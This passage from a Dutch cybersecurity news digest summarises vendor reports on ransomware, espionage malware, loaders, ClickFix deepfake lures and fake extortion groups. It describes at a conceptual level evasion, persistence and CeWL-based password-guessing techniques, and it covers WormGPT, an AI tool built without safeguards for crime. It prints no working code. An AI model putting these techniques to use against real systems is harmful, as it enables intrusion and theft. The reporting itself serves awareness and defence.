Volgens de advertenties hebben de aangeboden toegangen betrekking op systemen die draaien op het Linux-besturingssysteem. De verkoper claimt dat de koper toegang krijgt tot firewall-apparatuur en beschikt over root-rechten via Remote Code Execution. Hierbij zouden beheerdersrechten voor zowel de shell als het netwerkbeheerpaneel zijn inbegrepen. De lage prijs voor volledige controle over een AI-communicatieplatform wordt door waarnemers in de informatiebeveiligingssector geduid als een indicatie van tekortschietende basisbeveiliging bij de getroffen organisaties.

Onderzoekers van Forcepoint X-Labs hebben een phishingcampagne ontdekt waarbij de Phorpiex-malware wordt gebruikt om Global Group ransomware te verspreiden. De aanval maakt gebruik van misleidende Windows shortcut bestanden (.lnk) en een unieke 'mute' modus om data offline te versleutelen en traditionele beveiligingsdetectie te omzeilen.

De campagne, die actief was in 2024 en 2025, begint met een eenvoudige e-mail met als onderwerp "Uw Document". De bijlage is vaak een zip-bestand genaamd "Document.doc.lnk". Hackers gebruiken hier een dubbele extensie omdat Windows vaak het laatste deel van een bestandsnaam verbergt. Het lijkt op een Document.doc, maar het is eigenlijk een Windows Shortcut bestand (.lnk).

Wanneer de shortcut wordt aangeklikt, voert deze op de achtergrond commando's uit met behulp van de Living off the Land (LotL) methode. In plaats van eigen tools te gebruiken, kaapt het "gezonde" programma's van de computer, zoals PowerShell en Command Prompt, om de malware te downloaden. Deze malware wordt verborgen in systeem mappen onder namen als "windrv.exe" om op een legitiem Windows onderdeel te lijken.

De ransomware, genaamd Global Group, is de opvolger van de oudere Mamona ransomware. Wat deze versie problematisch maakt, is de "mute" modus. In tegenstelling tot de meeste virussen die verbinding maken met een server voor instructies, werkt Global Group volledig lokaal. De ransomware haalt geen externe encryptiesleutel op, maar genereert de sleutel op de hostmachine zelf. Omdat er geen serververbinding nodig is, kan het bestanden vergrendelen, zelfs op offline computers. Het gebruikt een sterk vergrendelingssysteem genaamd ChaCha20-Poly1305, waardoor het bijna onmogelijk is om bestanden te herstellen zonder de digitale sleutel van de criminelen.

Om onderzoek te bemoeilijken, gebruikt het een ping commando naar het adres 127.0.0.7 als een timer van drie seconden. Daarna verwijdert het zijn eigen bestanden van de harde schijf om minder sporen achter te laten. De ransomware zoekt ook naar backups en verwijdert Volume Shadow Copies. Eenmaal voltooid, krijgen de documenten de extensie ".Reco" en wordt de achtergrond vervangen door een losgeld bericht.

Forcepoint X-Labs adviseert om geen ongevraagde e-mails te openen, op links te klikken of bijlagen te downloaden en uit te voeren.

Bron: Forcepoint

Wachtwoorden blijven een zwak punt tussen bruikbaarheid en veiligheid. Controles om authenticatie te versterken, maken het vaak complexer, waardoor gebruikers vertrouwen op bekende patronen in plaats van onvoorspelbare inloggegevens. In de praktijk resulteert dit vaak in wachtwoorden die zijn afgeleid van de eigen taal van een organisatie. Aanvallers maken hier al langer misbruik van. In plaats van te vertrouwen op kunstmatige intelligentie of geavanceerde gokalgoritmen, beginnen veel credential aanvallen met iets veel eenvoudigers: het verzamelen van contextuele taal en het omzetten ervan in zeer gerichte wachtwoordgissingen.

Tools zoals Custom Word List generators (CeWL) maken dit proces efficiënt en herhaalbaar zonder extra technische complexiteit, waardoor de slagingspercentages aanzienlijk worden verbeterd en het risico op detectie wordt verminderd. Dit gedrag van aanvallers verklaart waarom NIST SP 800-63B expliciet adviseert tegen het gebruik van contextspecifieke woorden in wachtwoorden, inclusief servicenamen, gebruikersnamen en gerelateerde afgeleiden. Het afdwingen van die richtlijnen vereist echter inzicht in hoe aanvallers deze woordenlijsten samenstellen en operationaliseren in echte aanvallen.

CeWL is een open-source webcrawler die woorden van websites extraheert en ze in gestructureerde lijsten samenstelt. Het is standaard opgenomen in veelgebruikte penetratietestdistributies zoals Kali Linux en Parrot OS, wat de drempel verlaagt voor zowel aanvallers als verdedigers. Aanvallers gebruiken CeWL om de publiek toegankelijke digitale aanwezigheid van een organisatie te crawlen en terminologie te verzamelen die weerspiegelt hoe die organisatie extern communiceert. Dit omvat doorgaans beschrijvingen van bedrijfsservices, interne formuleringen die in documentatie worden gebruikt en branchespecifieke taal die niet in algemene wachtwoordwoordenboeken zou voorkomen. De effectiviteit van deze aanpak ligt niet in nieuwheid, maar in relevantie. De resulterende woordenlijsten weerspiegelen nauwkeurig de woordenschat die gebruikers al in hun dagelijkse werk tegenkomen en hebben daarom meer kans om de wachtwoordconstructie te beïnvloeden.

Verizon's Data Breach Investigation Report ontdekte dat gestolen inloggegevens betrokken zijn bij 44,7% van de datalekken. CeWL kan worden geconfigureerd om de crawldiepte en de minimale woordlengte te bepalen, waardoor aanvallers resultaten met een lage waarde kunnen uitsluiten. Wanneer op deze manier geoogst, vormt de output realistische wachtwoordkandidaten door voorspelbare transformaties. Voor een zorgorganisatie kan publiek toegankelijke inhoud termen bevatten zoals de naam van de organisatie, verwijzingen naar de locatie of de diensten of behandelingen die zij aanbiedt. Deze termen worden zelden geïsoleerd als wachtwoord gebruikt, maar dienen in plaats daarvan als een basisset van kandidaten die aanvallers systematisch aanpassen met behulp van veelvoorkomende patronen, zoals numerieke achtervoegsels, hoofdletters of toegevoegde symbolen om plausibele wachtwoordgissingen te genereren.

Zodra aanvallers wachtwoordhashes verkrijgen, vaak via inbreuken door derden of infostealer-infecties, passen tools zoals Hashcat deze mutatieregels op schaal toe. Miljoenen gerichte kandidaten kunnen efficiënt worden gegenereerd en getest op gecompromitteerde gegevens. Dezelfde woordenlijsten kunnen ook worden gebruikt tegen live authenticatiediensten, waar aanvallers kunnen vertrouwen op throttling, timing of low-and-slow guessing technieken om de kans op detectie of accountvergrendeling te verkleinen.

Een belangrijke uitdaging is dat veel wachtwoorden die op deze manier worden gegenereerd, voldoen aan de standaard complexiteitsvereisten. Uit analyse van Specops van meer dan zes miljard gecompromitteerde wachtwoorden blijkt dat organisaties blijven worstelen met dit onderscheid, zelfs waar bewustwordings- en trainingsprogramma's aanwezig zijn. Wanneer wachtwoorden zijn opgebouwd uit bekende organisatietaal, doet toegevoegde lengte of karaktervariatie weinig af aan de verminderde onzekerheid die wordt geïntroduceerd door zeer contextuele basistermen. Een wachtwoord als ZiekenhuisNaam123! illustreert dit probleem duidelijker. Hoewel het de standaard Active Directory-complexiteitsvereisten overschrijdt, blijft het een zwakke keuze binnen een zorgomgeving. CeWL-afgeleide woordenlijsten identificeren gemakkelijk organisatienamen en afkortingen die zijn verzameld uit publiek toegankelijke inhoud, waardoor aanvallers door minimale en systematische aanpassing tot plausibele wachtwoordvarianten kunnen komen.

Het verminderen van de blootstelling aan op woordenlijsten gebaseerde aanvallen vereist controles die de wachtwoordconstructie aanpakken in plaats van alleen de complexiteit. Voorkom dat gebruikers wachtwoorden maken op basis van organisatiespecifieke taal, zoals bedrijfs- en productnamen, interne projecttermen, branchevocabulaire en veelvoorkomende vervangingen door aanvallers, terwijl ook inloggegevens worden geblokkeerd die al in datalekken zijn verschenen. Specops Password Policy kan aangepaste uitsluitingswoordenboeken afdwingen en scant continu Active Directory tegen meer dan 5,4 miljard bekende gecompromitteerde wachtwoorden, waardoor CeWL-stijl woordenlijstaanvallen worden verstoord en het hergebruik van blootgestelde inloggegevens wordt verminderd.

Forceer een minimale lengte en complexiteit. Vereis wachtwoorden van minimaal 15 tekens, omdat lengte en onvoorspelbaarheid de beste bescherming bieden tegen brute-forcetechnieken. Wachtzinnen zijn de beste manier om gebruikers sterke, lange wachtwoorden te laten maken. Schakel multi-factor authenticatie (MFA) in. Hoewel MFA wachtwoordcompromissen niet voorkomt, beperkt het de impact van blootstelling van inloggegevens aanzienlijk door te voorkomen dat wachtwoorden als een zelfstandige authenticatiefactor worden gebruikt. Behandel wachtwoorden als een actieve beveiligingscontrole in plaats van een statische compliancevereiste. Het afdwingen van beleid dat contextafgeleide, eerder blootgestelde of gemakkelijk af te leiden wachtwoorden voorkomt, vermindert de waarde die aanvallers halen uit gerichte woordenlijsten, terwijl MFA een noodzakelijke tweede verdedigingslinie biedt wanneer inloggegevens worden gecompromitteerd. Samen vormen deze controles een veerkrachtigere authenticatiestrategie die weerspiegelt hoe wachtwoordaanvallen daadwerkelijk plaatsvinden.

Bron: Specops Software

Criminal IP, een AI-aangedreven platform voor dreigingsinformatie en analyse van aanvalsoppervlakken, is nu geïntegreerd met IBM QRadar SIEM en QRadar SOAR. Deze integratie brengt externe, IP-gebaseerde dreigingsinformatie direct in de detectie-, onderzoeks- en respons-workflows van IBM QRadar. Hierdoor kunnen securityteams sneller kwaadaardige activiteiten identificeren en responsacties effectiever prioriteren binnen SOC-operaties.

IBM QRadar wordt door veel bedrijven en publieke organisaties gebruikt als een centraal platform voor security monitoring, automatisering en incident response. Door Criminal IP-informatie in QRadar SIEM in te bedden en uit te breiden naar SOAR-workflows, kunnen organisaties externe dreigingscontext toepassen gedurende de incident lifecycle zonder de QRadar-omgeving te verlaten.

Met de Criminal IP QRadar SIEM-integratie kunnen securityteams firewall traffic logs analyseren en automatisch het risico beoordelen dat is verbonden aan communicerende IP-adressen. Traffic data die naar IBM QRadar SIEM wordt doorgestuurd, wordt geanalyseerd via de Criminal IP API en direct weergegeven in de SIEM-interface.

Waargenomen IP-adressen worden automatisch geclassificeerd in hoge, gemiddelde of lage risiconiveaus vanuit een dreigingsinformatieperspectief. Dit stelt SOC-teams in staat om snel IP's met een hoog risico te identificeren, inkomend en uitgaand verkeer te monitoren en responsacties te prioriteren, zoals het blokkeren van toegang of escalatie binnen de QRadar SIEM-workflow. Analisten kunnen met een rechtermuisklik op IP-adressen in QRadar Log Activity een gedetailleerd Criminal IP-rapport openen. Deze rapporten bieden context, waaronder dreigingsindicatoren, historisch gedrag en externe blootstellingssignalen, waardoor analisten risico en intentie kunnen valideren zonder van tool te wisselen.

Criminal IP is ook geïntegreerd met IBM QRadar SOAR om geautomatiseerde dreigingsverrijking tijdens incident response te ondersteunen. Met behulp van kant-en-klare playbooks kan Criminal IP-informatie worden toegepast op IP-adressen en URL-artefacten, waarbij verrijkingsresultaten direct worden teruggestuurd naar SOAR-cases als artefact hits of incidentnotities. Deze integratie omvat twee playbooks: Criminal IP: IP Threat Service – Verrijkt IP-adresartefacten met Criminal IP-dreigingscontext. Criminal IP: URL Threat Service – Voert lichte of volledige URL-scans uit en retourneert resultaten als artefact hits of incidentnotities.

AI SPERA CEO Byungtak Kang zegt dat de integratie het groeiende belang benadrukt van real-time, op blootstelling gebaseerde informatie in moderne SOC-omgevingen en de focus van Criminal IP op het verbeteren van detectievertrouwen en operationele efficiëntie door middel van praktische, op informatie gebaseerde integraties.

Criminal IP is het cyber threat intelligence platform ontwikkeld door AI SPERA en wordt gebruikt in meer dan 150 landen. Het platform maakt gebruik van AI en OSINT en levert threat scoring, reputatiedata en real-time detectie van kwaadaardige indicatoren, variërend van C2-servers en IOC's tot masking services zoals VPN's, proxies en anonieme VPN's, over IP's, domeinen en URL's.

Bron: AI SPERA

Bron 2: criminalip.io

De aan Rusland gelinkte cyber-spionagegroep Fancy Bear, ook bekend als APT28, heeft "Operation Neusploit" gelanceerd. Deze campagne maakt gebruik van een zero-day kwetsbaarheid, CVE-2026-21509, in Microsoft RTF-bestanden. Door dit lek te misbruiken, kunnen aanvallers willekeurige code uitvoeren op systemen van slachtoffers en zo backdoors en e-mail stealers installeren.

De campagne richt zich op organisaties in Centraal- en Oost-Europa, met name de overheid en militaire sectoren in Oekraïne, Slowakije en Roemenië. De aanval verspreidt kwaadaardige RTF-documenten via phishing e-mails met social engineering lures in het Engels, Roemeens, Slowaaks en Oekraïens. Deze documenten zijn ontworpen om overtuigend te zijn en lijken vaak op officiële overheidsdocumenten.

Analisten van Polyswarm hebben de malware geïdentificeerd en merken op dat deze traditionele beveiligingsmaatregelen omzeilt. Het maakt gebruik van ontwijkingstechnieken, controleert op specifieke User-Agent strings en verifieert geografische locaties voordat de payload wordt afgeleverd. Als aan de voorwaarden is voldaan, downloadt de keten een kwaadaardige dropper DLL, die verdere kwaadaardige componenten installeert.

Eenmaal gecompromitteerd, kan de malware gevoelige informatie stelen rechtstreeks uit Microsoft Outlook. Het monitort e-mailactiviteit, slaat berichten op en exfiltreert ze naar door de aanvaller gecontroleerde servers. Bovendien legt de malware een permanente verbinding met een command-and-control server, waardoor aanvallers langdurige toegang kunnen behouden en verdere commando's kunnen uitvoeren. Deze communicatie is vaak versleuteld om detectie te voorkomen.

Het infectiemechanisme omvat twee dropper DLL varianten. De eerste variant implementeert MiniDoor, een tool die registry keys wijzigt om de Outlook beveiliging te downgraden en een versleuteld script uit te pakken om e-mails te stelen. De tweede variant introduceert PixyNetLoader, die payloads dropt zoals een PNG-bestand dat kwaadaardige shellcode verbergt met behulp van steganografie.

Om persistentie te garanderen, gebruiken aanvallers COM hijacking. Ze registreren hun kwaadaardige bestand onder een legitieme naam, waardoor het besturingssysteem het laadt wanneer Explorer opnieuw start. Dit mechanisme zorgt ervoor dat de malware reboots overleeft en zijn spionageactiviteiten onopgemerkt kan voortzetten.

Organisaties wordt aangeraden onmiddellijk de patch voor CVE-2026-21509 toe te passen. Security teams moeten netwerkverkeer monitoren op de specifieke User-Agent strings en indicators of compromise die geassocieerd zijn met Operation Neusploit. Het is ook cruciaal om email security gateways bij te werken om kwaadaardige RTF-attachments uit te filteren. Security professionals zouden ook kunnen overwegen om RTF-bestanden volledig te blokkeren als ze niet nodig zijn voor de bedrijfsvoering.

Bron: Polyswarm

Een dreigingsactor die opereert onder het alias Sythe claimt verantwoordelijk te zijn voor het lekken van de complete WormGPT database. WormGPT is een berucht kunstmatig intelligentie platform gericht op cybercrime, dat sinds 2023 op dark web forums wordt verkocht.

Hackmanac stelde vast dat het vermeende datalek gevoelige informatie van meer dan 19.000 gebruikers heeft blootgelegd, waaronder e-mailadressen, gebruikers-ID's en metadata van abonnementen en facturering.

WormGPT is een kwaadaardige AI-tool, gebouwd op het GPT-J taalmodel dat in 2021 is ontwikkeld, en specifiek ontworpen om te opereren zonder de ethische grenzen en inhoudsrestricties die te vinden zijn in legitieme AI-platforms zoals ChatGPT. Het platform is getraind op malware-gerelateerde datasets en biedt functies zoals onbeperkte karakterondersteuning, chatgeheugenretentie en code-formatteringsmogelijkheden.

In tegenstelling tot reguliere AI-tools die strikte inhoudsfilters implementeren, is WormGPT expliciet gemaakt voor cybercriminele activiteiten. Het platform wordt sinds juni 2023 op underground hacking forums geadverteerd, en biedt toegang op basis van abonnementen via het dark web. Gebruikers konden kiezen uit verschillende AI-modellen die zijn afgestemd op algemeen of gespecialiseerd kwaadaardig gebruik, met geavanceerde functies zoals contextgeheugen voor lopende gesprekken en tools voor het formatteren van code.

WormGPT heeft alarmerende mogelijkheden aangetoond die aanzienlijke cybersecurityrisico's met zich meebrengen. Het platform blinkt uit in het genereren van zeer overtuigende phishing e-mails die slachtoffers kunnen misleiden om gevoelige informatie vrij te geven of malware te downloaden. Security onderzoekers die de tool testten, ontdekten dat het e-mails produceerde die "opmerkelijk overtuigend" en "strategisch slim" waren, wat het potentieel voor geavanceerde business email compromise (BEC) aanvallen aantoont.

Naast phishing kan WormGPT kwaadaardige code genereren, waaronder ransomware scripts, spyware en exploit code voor SQL injectie, cross-site scripting en buffer overflow kwetsbaarheden. Het platform kan ook misleidende webformulieren maken, kwaadaardige code verbergen en meertalige social engineering ondersteuning bieden, waardoor het bereik van cybercriminele operaties wordt uitgebreid zonder dat geavanceerde technische vaardigheden of taalvaardigheid vereist zijn.

De gelekte database met informatie van meer dan 19.000 gebruikers vertegenwoordigt een belangrijke ontwikkeling in het cybercrime ecosysteem. De blootstelling van e-mailadressen, gebruikers-ID's en factureringsmetadata kan wetshandhavingsinstanties waardevolle informatie verschaffen over personen die betrokken zijn bij cybercriminele activiteiten. Het roept echter ook zorgen op over mogelijke vergeldingsaanvallen of verdere exploitatie van de blootgestelde informatie.

Voormalig black hat hacker Daniel Kelley, die WormGPT in 2023 analyseerde, waarschuwde dat de tool zelfs beginnende cybercriminelen in staat stelt om snel en op schaal geavanceerde aanvallen uit te voeren zonder uitgebreide technische expertise. Het vermogen van het platform om cybercrime te automatiseren en te versnellen vertegenwoordigt een zorgwekkende evolutie in het dreigingslandschap, en laat zien hoe generatieve AI technologie kan worden ingezet voor kwaadaardige doeleinden.

Organisaties wordt geadviseerd waakzaam te blijven tegen AI-gestuurde phishing pogingen en social engineering aanvallen die mogelijk zijn gefaciliteerd door platforms zoals WormGPT.

Bron: Google

GuLoader, ook bekend als CloudEyE, heeft zich gevestigd als een hardnekkige dreiging in het cybersecuritylandschap. Het fungeert primair als een geavanceerde downloader en is ontworpen om secundaire malware payloads op te halen en uit te voeren, zoals de Remcos Remote Access Trojan (RAT) en information stealers zoals Vidar en Raccoon Stealer. Deze malware heeft aanzienlijke aandacht gekregen vanwege zijn geavanceerde mogelijkheden om beveiligingsfilters te omzeilen en het wijdverbreide gebruik ervan door dreigingsactoren die organisatienetwerken willen compromitteren voor gegevensdiefstal en surveillance.

Het infectieproces begint meestal met een kwaadaardige spam e-mail met een archiefbijlage, zoals een ZIP- of ISO-bestand. Deze archieven verbergen de initiële loader, vaak in de vorm van een VBScript of een NSIS-installatieprogramma, die zich voordoet als een legitiem zakelijk document of factuur. Na uitvoering initieert het script een meerstaps aanvalssequentie die de versleutelde shellcode downloadt. Deze shellcode is verantwoordelijk voor het voorbereiden van het systeem van het slachtoffer en het ophalen van de uiteindelijke kwaadaardige payload van een externe server om de infectieketen te voltooien.

Analisten van Zscaler hebben vastgesteld dat de nieuwste GuLoader-versie geavanceerde strategieën heeft aangenomen om detectie door moderne beveiligingsoplossingen te omzeilen. De onderzoekers merkten op dat de malware nu in sterke mate gebruikmaakt van vertrouwde cloudhostingplatforms, waaronder Google Drive en Microsoft OneDrive, om zijn versleutelde payloads op te slaan. Door gebruik te maken van deze gerenommeerde services zorgen de aanvallers ervoor dat het netwerkverkeer dat tijdens de downloadfase wordt gegenereerd, legitiem lijkt, waardoor op reputatie gebaseerde blokkeringsmechanismen worden omzeild die doorgaans verbindingen met onbekende of kwaadaardige domeinen zouden markeren. Deze strategische verschuiving naar cloudgebaseerde infrastructuur biedt de aanvallers veerkrachtige hosting die moeilijk op een zwarte lijst te plaatsen is zonder essentiële bedrijfsactiviteiten te verstoren. De versleutelde aard van de payloads bemoeilijkt de netwerkgebaseerde detectie verder, omdat de inhoud niet kan worden geïnspecteerd zonder decryptie. Deze combinatie van vertrouwde hosting en encryptie vormt een formidabele uitdaging voor verdedigers die uitsluitend vertrouwen op domeinreputatie en verkeersanalyse om hun omgevingen te beschermen.

Een kritische vooruitgang in het arsenaal van GuLoader is het gebruik van polymorfische code om statische analyse en op signaturen gebaseerde detectie te neutraliseren. In plaats van statische constanten in te bedden, genereert de malware deze waarden dynamisch tijdens runtime met behulp van een complexe reeks willekeurige rekenkundige bewerkingen. Hier worden instructies zoals XOR, ADD en SUB gecombineerd om de benodigde gegevens on-the-fly te berekenen, waardoor de codestructuur bij elke uitvoering verandert. Dit polymorfisme maakt traditionele antivirus signaturen effectief achterhaald. Bovendien bevat de malware uitgebreide anti-analyse technieken, waaronder het scannen van procesgeheugen op virtualisatie artefacten om sandboxes te detecteren en het gebruik van vector exception handlers om debugging inspanningen te verstoren.

Organisaties moeten uitgebreide e-mailfiltering implementeren om kwaadaardige bijlagen te blokkeren en de uitvoering van VBScript- en NSIS-bestanden te beperken. Het inschakelen van SSL-inspectie maakt de detectie van kwaadaardige inhoud binnen versleuteld verkeer naar clouddiensten mogelijk. Verder kan de implementatie van op gedrag gebaseerde endpointdetectie en response (EDR) oplossingen helpen bij het identificeren en beëindigen van de anomale activiteiten van de malware tijdens de uitvoeringsfase.

Bron: Zscaler

Hoog presterende SOC-teams (Security Operations Centers) maken steeds vaker gebruik van threat intelligence afkomstig van sandboxes om threat hunting herhaalbaar en effectief te maken. Tools zoals ANY.RUN's TI Lookup maken snellere hunts mogelijk, gebaseerd op het gedrag van echte aanvallers uit miljoenen analyses.

Threat hunting blijft een hoeksteen van volwassen SOC's, gericht op het detecteren van verborgen aanvallers voordat ze schade aanrichten. Veel programma's falen echter door gefragmenteerde databronnen, verouderde informatie en een gebrek aan context, wat leidt tot lange detectietijden en inefficiënt gebruik van middelen. Teams beginnen vaak met gedegen kennis van aanvalstechnieken uit frameworks zoals MITRE ATT&CK, maar hebben moeite om dit te vertalen naar schaalbare detecties. Zonder uitvoeringsgegevens zoals procesbomen, registerwijzigingen en netwerkstromen blijven hunts theoretisch. Indicators of Compromise (IOC's) komen geïsoleerd aan, zonder de reeksen die de aanvalsprogressie of de beoogde assets onthullen. Dit resulteert in hunts die weken van analisten tijd consumeren, met weinig vertrouwen in de outputs. Leidinggevenden zien een slechte ROI, omdat proactieve inspanningen er niet in slagen de incidentrisico's aantoonbaar te verminderen.

Vertraagde dreigingsdetectie vergroot de schade: aanvallers bereiken persistentie, credential diefstal of laterale beweging voordat ze worden gedetecteerd. De incidentkosten lopen op door bredere containment scopes en langere onderzoeken. Executives missen kwantificeerbare risicometriek, wat budgetbeslissingen bemoeilijkt. Analisten branden op door taken met een lage opbrengst, waardoor de focus wordt verlegd van werk met een hoge impact.

ANY.RUN's Threat Intelligence Reports worden gemaakt door analisten op basis van de meest recente sandbox-onderzoeksgegevens en worden geleverd met kant-en-klare TI Lookup queries. Toonaangevende SOC's geven prioriteit aan threat intelligence van live uitvoeringen boven statische rapporten. ANY.RUN's TI Lookup is hier een voorbeeld van en aggregeert gegevens van meer dan 50 miljoen sandbox-sessies door 15.000 SOC-teams en 600.000 analisten. De tool, gelanceerd in 2024 en verfijnd in 2025, biedt zoekopdrachten van 2 seconden in meer dan 40 soorten indicatoren, waaronder IOC's, Indicators of Behavior (IOB's), Indicators of Attack (IOA's) en TTP's. De versheid van de gegevens komt voort uit 16.000 dagelijkse bedreigingen die interactief worden verwerkt, waarbij ontwijkende malware wordt vastgelegd die door statische tools wordt gemist. Belangrijke enablers zijn API/SDK-integraties met SIEM's, SOAR's en TIP's; YARA-regeltests op basis van echte samples; en filters voor industrie, geografie en tijdframes.

Een van de use cases is MITRE ATT&CK techniek T1036.003 (Masquerading: Rename System Utilities). TI Lookup retourneert tientallen uitvoeringen die hernoemde processen laten zien, zoals "svchost.exe" die legitieme tools nabootsen met de commandoregel "powershell*=Get-Date". Hunters krijgen toegang tot sandbox-sessies om file drops, register tweaks en netwerk callbacks te observeren, waardoor detecties verder worden verfijnd dan generieke signaturen. Dit vermindert valse positieven en versnelt de dekking voor varianten.

SOC's melden snellere planning (minuten vs. uren), superieure regelkwaliteit en verminderde handmatige OSINT hunts. Bedrijven realiseren proactieve exposure reductie, geoptimaliseerde tool ROI en compliance via meetbare MTTR cuts. In het dreigingslandschap van 2026, waar cybercrime wereldwijd meer dan $20 biljoen kost, transformeren intelligence platforms zoals TI Lookup hunting van kunst naar wetenschap.

Bron: ANY.RUN

Noord-Koreaanse hackers hebben een medewerker van een cryptocurrency-bedrijf aangevallen met verschillende soorten malware en scams, waaronder een valse Zoom-meeting. Dit blijkt uit een rapport van Mandiant, een bedrijf dat onderdeel is van Google. De aanval, uitgevoerd door de financieel gemotiveerde dreigingsactor UNC1069, viel op door de gerichte aanpak.

De hackers legden via Telegram contact met het slachtoffer, gebruikmakend van het gecompromitteerde account van een andere cryptocurrency executive. Vervolgens stuurden ze een Calendly-link voor een Zoom-meeting van 30 minuten. Tijdens de meeting werd het slachtoffer een video getoond van een CEO van een ander cryptocurrency-bedrijf, die vermoedelijk een deepfake was. Mandiant kon het gebruik van AI-modellen niet verifiëren, maar de werkwijze lijkt op een eerder gemeld incident waarbij ook deepfakes werden gebruikt.

De hackers beweerden audiostoringen te ervaren en vroegen het slachtoffer om acties uit te voeren op hun apparaat om dit op te lossen. Dit was een dekmantel voor een ClickFix-aanval, waarbij malware wordt geïnstalleerd door het slachtoffer fictieve technische problemen te laten oplossen. Het slachtoffer werd naar een webpagina geleid met instructies voor zowel macOS- als Windows-systemen. In de reeks commando's zat een regel die de infectieketen startte. Het macOS-apparaat van het slachtoffer raakte geïnfecteerd.

De eerste schadelijke bestanden, WAVESHAPER en HYPERCALL, zijn backdoors die de hackers in staat stelden andere tools te installeren. Mandiant ontdekte twee verschillende data miners, DEEPBREATH en CHROMEPUSH. DEEPBREATH stelde de hackers in staat om credentials, browserdata en gebruikersdata van Telegram en Apple Notes te stelen. De malware comprimeert alle informatie in een ZIP-archief en stuurt het naar een remote server. CHROMEPUSH is een tool vermomd als een browser extensie voor het offline bewerken van Google Docs, maar registreert in werkelijkheid toetsaanslagen, gebruikersnamen en wachtwoorden, en steelt browser cookies.

Volgens Mandiant was de hoeveelheid tooling die op één host werd gebruikt ongebruikelijk groot, wat erop wijst dat het een gerichte aanval was om zoveel mogelijk informatie te stelen. Het doel was waarschijnlijk tweeledig: het stelen van cryptocurrency en het mogelijk maken van toekomstige social engineering campagnes door de identiteit en data van het slachtoffer te misbruiken.

Mandiant volgt UNC1069 sinds 2018 en heeft een evolutie in hun werkwijze gezien, met name in de recente targeting van gecentraliseerde exchanges, software ontwikkelaars bij financiële instellingen, high-tech bedrijven en personen bij venture capital fondsen. Hoewel UNC1069 minder impact heeft gehad op cryptocurrency heists dan andere groepen, blijft het een actieve dreiging gericht op financiële gewin. UNC1069 heeft in 2025 de financiële dienstverlening en de cryptocurrency-industrie in betalings-, brokerage-, staking- en wallet-infrastructuren aangevallen. De groep gebruikt valse Zoom-meetings en AI-tools. Mandiant heeft waargenomen dat de Noord-Koreaanse groep Google's Gemini AI-tool gebruikt voor operationeel onderzoek en het ontwikkelen van tools.

Vorige maand verklaarden Amerikaanse functionarissen bij de Verenigde Naties dat tientallen landen te maken hebben gehad met crypto diefstallen gepleegd door Noord-Koreaanse hackers. Het land wordt ervan beschuldigd in 2025 meer dan 2 miljard dollar aan crypto te hebben gestolen.

Bron: Mandiant

Bron 2: cloud.google.com

Bron 3: news.ycombinator.com

Bron 4: bsky.app

Bron 5: recordedfuture.com

Bron 6: recordedfuture.com

De nieuwe cybercrimegroep 0APT wordt ervan beschuldigd honderden grote bedrijven te hebben gehackt, maar beveiligingsexperts zeggen dat het waarschijnlijk een bluf is. Volgens onderzoekers van het Research and Intelligence Team (GRIT) van GuidePoint, gebruikt de groep een mix van valse namen en bestaande bedrijven om organisaties te misleiden en losgeld te betalen voor data die nooit gestolen is. De onderzoekers hebben geen bewijs gezien dat de vermeende slachtoffers daadwerkelijk gehackt zijn en beschrijven de lijsten als "volledig verzonnen generieke bedrijfsnamen en herkenbare organisaties."

De snelheid waarmee 0APT opereert, wekte argwaan. De groep verscheen op 28 januari 2026 en claimde binnen een week meer dan 200 slachtoffers. De website van de groep, die eruitzag als een standaard site voor het lekken van gestolen data, ging op 8 februari offline nadat rapporten opdoken dat de cijfers niet klopten. De volgende dag verscheen de site weer, maar met een lijst van slechts 15 grote internationale organisaties. Het team ontdekte ook dat er bij sommige van deze "slachtoffers" helemaal geen inbraak had plaatsgevonden. De interface van de leak site lijkt op een site die eerder werd gebruikt door ShinyHunters en een bijbehorende groep, waar databases van bedrijven zoals SoundCloud, Crunchbase en Betterment vorige maand werden gelekt.

Verder onderzoek leidde tot een simpele truc achter de "lekken". De servers van de groep sturen waarschijnlijk een stroom van /dev/random direct naar de browser van de gebruiker. In feite sturen ze nutteloze digitale "ruis" naar de computer van een gebruiker om het te laten lijken alsof er een enorm, 20 GB versleuteld bestand wordt gedownload.

Zelfs zonder een echte hack probeert 0APT geld te verdienen. Volgens een blogpost van GuidePoint, die exclusief met Hackread.com werd gedeeld, probeert de groep mogelijk bedrijven opnieuw af te persen met behulp van oude data die jaren geleden door andere groepen is gestolen. 0APT volgt een patroon dat is gezet door andere "fabulisten" of nep-groepen. Een groep genaamd RansomedVC kocht bijvoorbeeld oude gestolen data of "creëerde zelfs fictieve data om een van hun slachtoffers te misleiden" in 2023. Een andere groep, FunkSec, gebruikte eenvoudige tools om valse geloofwaardigheid op te bouwen voor hun eigen forums en veilingsites.

Eerdere versies van de site van 0APT vereisten een "1BTC security bond" van iedereen die zich bij hun operatie wilde aansluiten. Een groep genaamd Mogilevich gebruikte dezelfde tactiek in 2024. Die groep gaf later toe: "In werkelijkheid zijn we geen ransomware-as-a-service, maar professionele fraudeurs." De Mogilevich actor claimde geïnteresseerde cybercriminelen voor minstens $85.000 te hebben opgelicht. Hoewel de huidige claims van 0APT waarschijnlijk "volledig verzonnen" zijn, kunnen ze later echte aanvallen uitvoeren. Voorlopig hoeven bedrijven niet in paniek te raken. Tenzij er een losgeldbriefje of vergrendelde bestanden worden gevonden, is de vermelding op hun lijst waarschijnlijk slechts een verzinsel.

Bron: GuidePoint

Een misleidende campagne is ontdekt waarbij nietsvermoedende gebruikers worden verleid om een nagemaakte versie van de populaire 7-Zip software te downloaden. Hiermee worden computers stilletjes omgevormd tot residential proxy nodes. De campagne maakt gebruik van een domein dat sterk lijkt op de officiële 7-zip.org website, namelijk 7zip[.]com. Gebruikers worden zo misleid om een geïnfecteerd installatiebestand te downloaden dat functioneel lijkt, maar in werkelijkheid schadelijke malware bevat.

De dreiging kwam aan het licht nadat een Reddit-gebruiker zijn ervaring deelde op r/pcmasterrace. Tijdens het volgen van een YouTube-tutorial voor het bouwen van een nieuwe pc werd hij verwezen naar het frauduleuze domein om 7-Zip te downloaden. Na de installatie van de software op zowel een laptop als een desktop via een USB-overdracht, ondervond de gebruiker compatibiliteitsproblemen, maar bleef het systeem gebruiken. Na bijna twee weken detecteerde Microsoft Defender de infectie met een generieke trojan.

